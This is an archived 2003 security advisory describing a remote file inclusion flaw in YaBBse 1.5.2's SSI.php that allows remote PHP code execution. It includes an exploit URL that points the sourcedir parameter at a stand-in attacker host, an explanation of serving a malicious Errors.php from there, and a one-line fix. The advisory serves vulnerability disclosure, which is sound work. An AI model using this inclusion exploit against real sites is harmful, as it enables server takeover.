Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bt153.txt

II-Labs Advisory: Remote code execution in YaBBse 1.5.2 (php version)







                

                  [ Illegal Instruction Labs Advisory ]

[------------------------------------------------------------------------]

Advisory name: Remote code execution in YaBBse 1.5.2 (php version)

Advisory number: 13

Application: Yet another Bulletin Board 1.5.2 

Vendor: www.yabbse.org                                        

Date: 06.05.2003

Impact: Attacker can execute arbitrary php code 

Tested on: *

Discovered by: Dalibor Karlovic & DownBload

Mail me @: downbload@hotmail.com	

Homepage: www.kamikaza.org







======[ Overview 

YaBB is widely used bulletin board system. 







======[ Problem  	

One of the files that are included in main application is vulnerable 

to remote code execution if it is accessed directly with certain 

parameters.

Name of the file is SSI.php.

Simmilar bug was discovered in previous version YaBB 1.5.1.



SSI.php:

------------------------------------------

include_once ($sourcedir . '/Errors.php');

include_once ($sourcedir . '/Subs.php');

include_once ($sourcedir . '/Load.php');    

------------------------------------------



We can define $sourcedir variable through URL and include some other

PHP script local or remote if remote inclusion is enabled in php.ini file.

Bug in not exploitable if PHP's registar_globals is set to off. 









======[ Exploit



Exploit would look like this:

----cut here----

http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com

----cut here----



Attacker would place an Errors.php file on his server. The code included

would get executed on victim's server.

Attacker's httpd server should not have php enabled because the

script will be parsed before sending it to the victim.









======[ Solution



Add this line before include_once() lines mentioned above.



----cut here----

if (!isset($sourcedir)) $sourcedir = "";

----cut here----









======[ Greetz 

Greetz goes to #hr.hackers and #linux <irc.carnet.hr>. 

Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 

Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

Shitz goes to stupid darkman, who will exploit this bug and claim that

he is a great hacker.



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH